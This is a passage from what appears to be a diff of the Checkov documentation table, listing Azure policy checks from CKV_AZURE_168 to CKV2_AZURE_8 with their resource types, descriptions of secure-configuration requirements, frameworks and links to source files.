-| 1925 | CKV_AZURE_168 | resource | azurerm_kubernetes_cluster_node_pool | Ensure Azure Kubernetes Cluster (AKS) nodes should use a minimum number of 50 pods. | Terraform | [AKSMaxPodsMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSMaxPodsMinimum.py) |
-| 1926 | CKV_AZURE_169 | resource | azurerm_kubernetes_cluster | Ensure Azure Kubernetes Cluster (AKS) nodes use scale sets | Terraform | [AKSPoolTypeIsScaleSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSPoolTypeIsScaleSet.py) |
-| 1927 | CKV_AZURE_170 | resource | azurerm_kubernetes_cluster | Ensure that AKS use the Paid Sku for its SLA | Terraform | [AKSIsPaidSku.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSIsPaidSku.py) |
-| 1928 | CKV_AZURE_171 | resource | azurerm_kubernetes_cluster | Ensure AKS cluster upgrade channel is chosen | Terraform | [AKSUpgradeChannel.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSUpgradeChannel.py) |
-| 1929 | CKV_AZURE_172 | resource | azurerm_kubernetes_cluster | Ensure autorotation of Secrets Store CSI Driver secrets for AKS clusters | Terraform | [AKSSecretStoreRotation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSSecretStoreRotation.py) |
-| 1930 | CKV_AZURE_173 | resource | azurerm_api_management | Ensure API management uses at least TLS 1.2 | Terraform | [APIManagementMinTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIManagementMinTLS12.py) |
-| 1931 | CKV_AZURE_174 | resource | azurerm_api_management | Ensure API management public access is disabled | Terraform | [APIManagementPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIManagementPublicAccess.py) |
-| 1932 | CKV_AZURE_175 | resource | azurerm_web_pubsub | Ensure Web PubSub uses a SKU with an SLA | Terraform | [PubsubSKUSLA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PubsubSKUSLA.py) |
-| 1933 | CKV_AZURE_176 | resource | azurerm_web_pubsub | Ensure Web PubSub uses managed identities to access Azure resources | Terraform | [PubsubSpecifyIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/PubsubSpecifyIdentity.py) |
-| 1934 | CKV_AZURE_177 | resource | azurerm_windows_virtual_machine | Ensure Windows VM enables automatic updates | Terraform | [WinVMAutomaticUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/WinVMAutomaticUpdates.py) |
-| 1935 | CKV_AZURE_177 | resource | azurerm_windows_virtual_machine_scale_set | Ensure Windows VM enables automatic updates | Terraform | [WinVMAutomaticUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/WinVMAutomaticUpdates.py) |
-| 1936 | CKV_AZURE_178 | resource | azurerm_linux_virtual_machine | Ensure linux VM enables SSH with keys for secure communication | Terraform | [LinuxVMUsesSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/LinuxVMUsesSSH.py) |
-| 1937 | CKV_AZURE_178 | resource | azurerm_linux_virtual_machine_scale_set | Ensure linux VM enables SSH with keys for secure communication | Terraform | [LinuxVMUsesSSH.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/LinuxVMUsesSSH.py) |
-| 1938 | CKV_AZURE_179 | resource | azurerm_linux_virtual_machine | Ensure VM agent is installed | Terraform | [VMAgentIsInstalled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMAgentIsInstalled.py) |
-| 1939 | CKV_AZURE_179 | resource | azurerm_linux_virtual_machine_scale_set | Ensure VM agent is installed | Terraform | [VMAgentIsInstalled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMAgentIsInstalled.py) |
-| 1940 | CKV_AZURE_179 | resource | azurerm_windows_virtual_machine | Ensure VM agent is installed | Terraform | [VMAgentIsInstalled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMAgentIsInstalled.py) |
-| 1941 | CKV_AZURE_179 | resource | azurerm_windows_virtual_machine_scale_set | Ensure VM agent is installed | Terraform | [VMAgentIsInstalled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VMAgentIsInstalled.py) |
-| 1942 | CKV_AZURE_180 | resource | azurerm_kusto_cluster | Ensure that data explorer uses Sku with an SLA | Terraform | [DataExplorerSKUHasSLA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataExplorerSKUHasSLA.py) |
-| 1943 | CKV_AZURE_181 | resource | azurerm_kusto_cluster | Ensure that data explorer/Kusto uses managed identities to access Azure resources securely. | Terraform | [DataExplorerServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/DataExplorerServiceIdentity.py) |
-| 1944 | CKV_AZURE_182 | resource | azurerm_virtual_network | Ensure that VNET has at least 2 connected DNS Endpoints | Terraform | [VnetSingleDNSServer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VnetSingleDNSServer.py) |
-| 1945 | CKV_AZURE_182 | resource | azurerm_virtual_network_dns_servers | Ensure that VNET has at least 2 connected DNS Endpoints | Terraform | [VnetSingleDNSServer.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VnetSingleDNSServer.py) |
-| 1946 | CKV_AZURE_183 | resource | azurerm_virtual_network | Ensure that VNET uses local DNS addresses | Terraform | [VnetLocalDNS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/VnetLocalDNS.py) |
-| 1947 | CKV_AZURE_184 | resource | azurerm_app_configuration | Ensure 'local_auth_enabled' is set to 'False' | Terraform | [AppConfigLocalAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigLocalAuth.py) |
-| 1948 | CKV_AZURE_185 | resource | azurerm_app_configuration | Ensure 'Public Access' is not Enabled for App configuration | Terraform | [AppConfigPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigPublicAccess.py) |
-| 1949 | CKV_AZURE_186 | resource | azurerm_app_configuration | Ensure App configuration encryption block is set. | Terraform | [AppConfigEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigEncryption.py) |
-| 1950 | CKV_AZURE_187 | resource | azurerm_app_configuration | Ensure App configuration purge protection is enabled | Terraform | [AppConfigPurgeProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigPurgeProtection.py) |
-| 1951 | CKV_AZURE_188 | resource | azurerm_app_configuration | Ensure App configuration Sku is standard | Terraform | [AppConfigSku.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppConfigSku.py) |
-| 1952 | CKV_AZURE_189 | resource | azurerm_key_vault | Ensure that Azure Key Vault disables public network access | Terraform | [KeyVaultDisablesPublicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/KeyVaultDisablesPublicNetworkAccess.py) |
-| 1953 | CKV_AZURE_190 | resource | azurerm_storage_account | Ensure that Storage blobs restrict public access | Terraform | [StorageBlobRestrictPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageBlobRestrictPublicAccess.py) |
-| 1954 | CKV_AZURE_191 | resource | azurerm_eventgrid_topic | Ensure that Managed identity provider is enabled for Azure Event Grid Topic | Terraform | [EventgridTopicIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridTopicIdentityProviderEnabled.py) |
-| 1955 | CKV_AZURE_192 | resource | azurerm_eventgrid_topic | Ensure that Azure Event Grid Topic local Authentication is disabled | Terraform | [EventgridTopicLocalAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridTopicLocalAuthentication.py) |
-| 1956 | CKV_AZURE_193 | resource | azurerm_eventgrid_topic | Ensure public network access is disabled for Azure Event Grid Topic | Terraform | [EventgridTopicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridTopicNetworkAccess.py) |
-| 1957 | CKV_AZURE_194 | resource | azurerm_eventgrid_domain | Ensure that Managed identity provider is enabled for Azure Event Grid Domain | Terraform | [EventgridDomainIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridDomainIdentityProviderEnabled.py) |
-| 1958 | CKV_AZURE_195 | resource | azurerm_eventgrid_domain | Ensure that Azure Event Grid Domain local Authentication is disabled | Terraform | [EventgridDomainLocalAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventgridDomainLocalAuthentication.py) |
-| 1959 | CKV_AZURE_196 | resource | azurerm_signalr_service | Ensure that SignalR uses a Paid Sku for its SLA | Terraform | [SignalRSKUSLA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SignalRSKUSLA.py) |
-| 1960 | CKV_AZURE_197 | resource | azurerm_cdn_endpoint | Ensure the Azure CDN disables the HTTP endpoint | Terraform | [CDNDisableHttpEndpoints.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CDNDisableHttpEndpoints.py) |
-| 1961 | CKV_AZURE_198 | resource | azurerm_cdn_endpoint | Ensure the Azure CDN enables the HTTPS endpoint | Terraform | [CDNEnableHttpsEndpoints.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CDNEnableHttpsEndpoints.py) |
-| 1962 | CKV_AZURE_199 | resource | azurerm_servicebus_namespace | Ensure that Azure Service Bus uses double encryption | Terraform | [AzureServicebusDoubleEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusDoubleEncryptionEnabled.py) |
-| 1963 | CKV_AZURE_200 | resource | azurerm_cdn_endpoint_custom_domain | Ensure the Azure CDN endpoint is using the latest version of TLS encryption | Terraform | [CDNTLSProtocol12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/CDNTLSProtocol12.py) |
-| 1964 | CKV_AZURE_201 | resource | azurerm_servicebus_namespace | Ensure that Azure Service Bus uses a customer-managed key to encrypt data | Terraform | [AzureServicebusHasCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusHasCMK.py) |
-| 1965 | CKV_AZURE_202 | resource | azurerm_servicebus_namespace | Ensure that Managed identity provider is enabled for Azure Service Bus | Terraform | [AzureServicebusIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusIdentityProviderEnabled.py) |
-| 1966 | CKV_AZURE_203 | resource | azurerm_servicebus_namespace | Ensure Azure Service Bus Local Authentication is disabled | Terraform | [AzureServicebusLocalAuthDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusLocalAuthDisabled.py) |
-| 1967 | CKV_AZURE_204 | resource | azurerm_servicebus_namespace | Ensure 'public network access enabled' is set to 'False' for Azure Service Bus | Terraform | [AzureServicebusPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusPublicAccessDisabled.py) |
-| 1968 | CKV_AZURE_205 | resource | azurerm_servicebus_namespace | Ensure Azure Service Bus is using the latest version of TLS encryption | Terraform | [AzureServicebusMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureServicebusMinTLSVersion.py) |
-| 1969 | CKV_AZURE_206 | resource | azurerm_storage_account | Ensure that Storage Accounts use replication | Terraform | [StorageAccountsUseReplication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/StorageAccountsUseReplication.py) |
-| 1970 | CKV_AZURE_207 | resource | azurerm_search_service | Ensure Azure Cognitive Search service uses managed identities to access Azure resources | Terraform | [AzureSearchManagedIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchManagedIdentity.py) |
-| 1971 | CKV_AZURE_208 | resource | azurerm_search_service | Ensure that Azure Cognitive Search maintains SLA for index updates | Terraform | [AzureSearchSLAIndex.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchSLAIndex.py) |
-| 1972 | CKV_AZURE_209 | resource | azurerm_search_service | Ensure that Azure Cognitive Search maintains SLA for search index queries | Terraform | [AzureSearchSLAQueryUpdates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchSLAQueryUpdates.py) |
-| 1973 | CKV_AZURE_210 | resource | azurerm_search_service | Ensure Azure Cognitive Search service allowed IPS does not give public Access | Terraform | [AzureSearchAllowedIPsNotGlobal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureSearchAllowedIPsNotGlobal.py) |
-| 1974 | CKV_AZURE_211 | resource | azurerm_service_plan | Ensure App Service plan suitable for production use | Terraform | [AppServiceSkuMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSkuMinimum.py) |
-| 1975 | CKV_AZURE_212 | resource | azurerm_service_plan | Ensure App Service has a minimum number of instances for failover | Terraform | [AppServiceInstanceMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceInstanceMinimum.py) |
-| 1976 | CKV_AZURE_213 | resource | azurerm_app_service | Ensure that App Service configures health check | Terraform | [AppServiceSetHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSetHealthCheck.py) |
-| 1977 | CKV_AZURE_213 | resource | azurerm_linux_web_app | Ensure that App Service configures health check | Terraform | [AppServiceSetHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSetHealthCheck.py) |
-| 1978 | CKV_AZURE_213 | resource | azurerm_windows_web_app | Ensure that App Service configures health check | Terraform | [AppServiceSetHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceSetHealthCheck.py) |
-| 1979 | CKV_AZURE_214 | resource | azurerm_linux_web_app | Ensure App Service is set to be always on | Terraform | [AppServiceAlwaysOn.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAlwaysOn.py) |
-| 1980 | CKV_AZURE_214 | resource | azurerm_windows_web_app | Ensure App Service is set to be always on | Terraform | [AppServiceAlwaysOn.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceAlwaysOn.py) |
-| 1981 | CKV_AZURE_215 | resource | azurerm_api_management_backend | Ensure API management backend uses https | Terraform | [APIManagementBackendHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/APIManagementBackendHTTPS.py) |
-| 1982 | CKV_AZURE_216 | resource | Microsoft.Network/azureFirewalls | Ensure DenyIntelMode is set to Deny for Azure Firewalls | arm | [AzureFirewallDenyThreatIntelMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureFirewallDenyThreatIntelMode.py) |
-| 1983 | CKV_AZURE_216 | resource | Microsoft.Network/azureFirewalls | Ensure DenyIntelMode is set to Deny for Azure Firewalls | Bicep | [AzureFirewallDenyThreatIntelMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureFirewallDenyThreatIntelMode.py) |
-| 1984 | CKV_AZURE_216 | resource | azurerm_firewall | Ensure DenyIntelMode is set to Deny for Azure Firewalls | Terraform | [AzureFirewallDenyThreatIntelMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureFirewallDenyThreatIntelMode.py) |
-| 1985 | CKV_AZURE_217 | resource | azurerm_application_gateway | Ensure Azure Application gateways listener that allow connection requests over HTTP | Terraform | [AppGWUsesHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppGWUsesHttps.py) |
-| 1986 | CKV_AZURE_218 | resource | azurerm_application_gateway | Ensure Application Gateway defines secure protocols for in transit communication | Terraform | [AppGWDefinesSecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppGWDefinesSecureProtocols.py) |
-| 1987 | CKV_AZURE_219 | resource | azurerm_firewall | Ensure Firewall defines a firewall policy | Terraform | [AzureFirewallDefinesPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureFirewallDefinesPolicy.py) |
-| 1988 | CKV_AZURE_220 | resource | azurerm_firewall_policy | Ensure Firewall policy has IDPS mode as deny | Terraform | [AzureFirewallPolicyIDPSDeny.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureFirewallPolicyIDPSDeny.py) |
-| 1989 | CKV_AZURE_221 | resource | azurerm_linux_function_app | Ensure that Azure Function App public network access is disabled | Terraform | [FunctionAppPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppPublicAccessDisabled.py) |
-| 1990 | CKV_AZURE_221 | resource | azurerm_linux_function_app_slot | Ensure that Azure Function App public network access is disabled | Terraform | [FunctionAppPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppPublicAccessDisabled.py) |
-| 1991 | CKV_AZURE_221 | resource | azurerm_windows_function_app | Ensure that Azure Function App public network access is disabled | Terraform | [FunctionAppPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppPublicAccessDisabled.py) |
-| 1992 | CKV_AZURE_221 | resource | azurerm_windows_function_app_slot | Ensure that Azure Function App public network access is disabled | Terraform | [FunctionAppPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/FunctionAppPublicAccessDisabled.py) |
-| 1993 | CKV_AZURE_222 | resource | azurerm_linux_web_app | Ensure that Azure Web App public network access is disabled | Terraform | [AppServicePublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePublicAccessDisabled.py) |
-| 1994 | CKV_AZURE_222 | resource | azurerm_windows_web_app | Ensure that Azure Web App public network access is disabled | Terraform | [AppServicePublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePublicAccessDisabled.py) |
-| 1995 | CKV_AZURE_223 | resource | azurerm_eventhub_namespace | Ensure Event Hub Namespace uses at least TLS 1.2 | Terraform | [EventHubNamespaceMinTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventHubNamespaceMinTLS12.py) |
-| 1996 | CKV_AZURE_224 | resource | azurerm_mssql_database | Ensure that the Ledger feature is enabled on database that requires cryptographic proof and nonrepudiation of data integrity | Terraform | [SQLDatabaseLedgerEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLDatabaseLedgerEnabled.py) |
-| 1997 | CKV_AZURE_225 | resource | azurerm_service_plan | Ensure the App Service Plan is zone redundant | Terraform | [AppServicePlanZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServicePlanZoneRedundant.py) |
-| 1998 | CKV_AZURE_226 | resource | azurerm_kubernetes_cluster | Ensure ephemeral disks are used for OS disks | Terraform | [AKSEphemeralOSDisks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSEphemeralOSDisks.py) |
-| 1999 | CKV_AZURE_227 | resource | azurerm_kubernetes_cluster | Ensure that the AKS cluster encrypt temp disks, caches, and data flows between Compute and Storage resources | Terraform | [AKSEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSEncryptionAtHostEnabled.py) |
-| 2000 | CKV_AZURE_227 | resource | azurerm_kubernetes_cluster_node_pool | Ensure that the AKS cluster encrypt temp disks, caches, and data flows between Compute and Storage resources | Terraform | [AKSEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSEncryptionAtHostEnabled.py) |
-| 2001 | CKV_AZURE_228 | resource | azurerm_eventhub_namespace | Ensure the Azure Event Hub Namespace is zone redundant | Terraform | [EventHubNamespaceZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/EventHubNamespaceZoneRedundant.py) |
-| 2002 | CKV_AZURE_229 | resource | azurerm_mssql_database | Ensure the Azure SQL Database Namespace is zone redundant | Terraform | [SQLDatabaseZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/SQLDatabaseZoneRedundant.py) |
-| 2003 | CKV_AZURE_230 | resource | azurerm_redis_cache | Standard Replication should be enabled | Terraform | [RedisCacheStandardReplicationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/RedisCacheStandardReplicationEnabled.py) |
-| 2004 | CKV_AZURE_231 | resource | azurerm_app_service_environment_v3 | Ensure App Service Environment is zone redundant | Terraform | [AppServiceEnvironmentZoneRedundant.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AppServiceEnvironmentZoneRedundant.py) |
-| 2005 | CKV_AZURE_232 | resource | azurerm_kubernetes_cluster | Ensure that only critical system pods run on system nodes | Terraform | [AKSOnlyCriticalPodsOnSystemNodes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AKSOnlyCriticalPodsOnSystemNodes.py) |
-| 2006 | CKV_AZURE_233 | resource | azurerm_container_registry | Ensure Azure Container Registry (ACR) is zone redundant | Terraform | [ACREnableZoneRedundancy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACREnableZoneRedundancy.py) |
-| 2007 | CKV_AZURE_234 | resource | azurerm_security_center_subscription_pricing | Ensure that Azure Defender for cloud is set to On for Resource Manager | Terraform | [AzureDefenderDisabledForResManager.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureDefenderDisabledForResManager.py) |
-| 2008 | CKV_AZURE_235 | resource | azurerm_container_group | Ensure that Azure container environment variables are configured with secure values only | Terraform | [AzureContainerInstanceEnvVarSecureValueType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/AzureContainerInstanceEnvVarSecureValueType.py) |
-| 2009 | CKV_AZURE_237 | resource | azurerm_container_registry | Ensure dedicated data endpoints are enabled. | Terraform | [ACRDedicatedDataEndpointEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/azure/ACRDedicatedDataEndpointEnabled.py) |
-| 2010 | CKV2_AZURE_1 | resource | azurerm_storage_account | Ensure storage for critical data are encrypted with Customer Managed Key | Terraform | [StorageCriticalDataEncryptedCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageCriticalDataEncryptedCMK.yaml) |
-| 2011 | CKV2_AZURE_2 | resource | azurerm_mssql_server_security_alert_policy | Ensure that Vulnerability Assessment (VA) is enabled on a SQL server by setting a Storage Account | Terraform | [VAisEnabledInStorageAccount.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAisEnabledInStorageAccount.yaml) |
-| 2012 | CKV2_AZURE_2 | resource | azurerm_sql_server | Ensure that Vulnerability Assessment (VA) is enabled on a SQL server by setting a Storage Account | Terraform | [VAisEnabledInStorageAccount.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAisEnabledInStorageAccount.yaml) |
-| 2013 | CKV2_AZURE_3 | resource | azurerm_mssql_server | Ensure that VA setting Periodic Recurring Scans is enabled on a SQL server | Terraform | [VAsetPeriodicScansOnSQL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAsetPeriodicScansOnSQL.yaml) |
-| 2014 | CKV2_AZURE_3 | resource | azurerm_mssql_server_security_alert_policy | Ensure that VA setting Periodic Recurring Scans is enabled on a SQL server | Terraform | [VAsetPeriodicScansOnSQL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAsetPeriodicScansOnSQL.yaml) |
-| 2015 | CKV2_AZURE_3 | resource | azurerm_mssql_server_vulnerability_assessment | Ensure that VA setting Periodic Recurring Scans is enabled on a SQL server | Terraform | [VAsetPeriodicScansOnSQL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAsetPeriodicScansOnSQL.yaml) |
-| 2016 | CKV2_AZURE_3 | resource | azurerm_sql_server | Ensure that VA setting Periodic Recurring Scans is enabled on a SQL server | Terraform | [VAsetPeriodicScansOnSQL.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAsetPeriodicScansOnSQL.yaml) |
-| 2017 | CKV2_AZURE_4 | resource | azurerm_mssql_server | Ensure Azure SQL server ADS VA Send scan reports to is configured | Terraform | [VAconfiguredToSendReports.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReports.yaml) |
-| 2018 | CKV2_AZURE_4 | resource | azurerm_mssql_server_security_alert_policy | Ensure Azure SQL server ADS VA Send scan reports to is configured | Terraform | [VAconfiguredToSendReports.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReports.yaml) |
-| 2019 | CKV2_AZURE_4 | resource | azurerm_mssql_server_vulnerability_assessment | Ensure Azure SQL server ADS VA Send scan reports to is configured | Terraform | [VAconfiguredToSendReports.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReports.yaml) |
-| 2020 | CKV2_AZURE_4 | resource | azurerm_sql_server | Ensure Azure SQL server ADS VA Send scan reports to is configured | Terraform | [VAconfiguredToSendReports.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReports.yaml) |
-| 2021 | CKV2_AZURE_5 | resource | azurerm_mssql_server | Ensure that VA setting 'Also send email notifications to admins and subscription owners' is set for a SQL server | Terraform | [VAconfiguredToSendReportsToAdmins.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReportsToAdmins.yaml) |
-| 2022 | CKV2_AZURE_5 | resource | azurerm_mssql_server_security_alert_policy | Ensure that VA setting 'Also send email notifications to admins and subscription owners' is set for a SQL server | Terraform | [VAconfiguredToSendReportsToAdmins.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReportsToAdmins.yaml) |
-| 2023 | CKV2_AZURE_5 | resource | azurerm_mssql_server_vulnerability_assessment | Ensure that VA setting 'Also send email notifications to admins and subscription owners' is set for a SQL server | Terraform | [VAconfiguredToSendReportsToAdmins.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReportsToAdmins.yaml) |
-| 2024 | CKV2_AZURE_5 | resource | azurerm_sql_server | Ensure that VA setting 'Also send email notifications to admins and subscription owners' is set for a SQL server | Terraform | [VAconfiguredToSendReportsToAdmins.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReportsToAdmins.yaml) |
-| 2025 | CKV2_AZURE_6 | resource | azurerm_sql_firewall_rule | Ensure 'Allow access to Azure services' for PostgreSQL Database Server is disabled | Terraform | [AccessToPostgreSQLFromAzureServicesIsDisabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AccessToPostgreSQLFromAzureServicesIsDisabled.yaml) |
-| 2026 | CKV2_AZURE_6 | resource | azurerm_sql_server | Ensure 'Allow access to Azure services' for PostgreSQL Database Server is disabled | Terraform | [AccessToPostgreSQLFromAzureServicesIsDisabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AccessToPostgreSQLFromAzureServicesIsDisabled.yaml) |
-| 2027 | CKV2_AZURE_7 | resource | azurerm_sql_server | Ensure that Azure Active Directory Admin is configured | Terraform | [AzureActiveDirectoryAdminIsConfigured.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureActiveDirectoryAdminIsConfigured.yaml) |
-| 2028 | CKV2_AZURE_8 | resource | azurerm_monitor_activity_log_alert | Ensure the storage container storing the activity logs is not publicly accessible | Terraform | [StorageContainerActivityLogsNotPublic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageContainerActivityLogsNotPublic.yaml) |
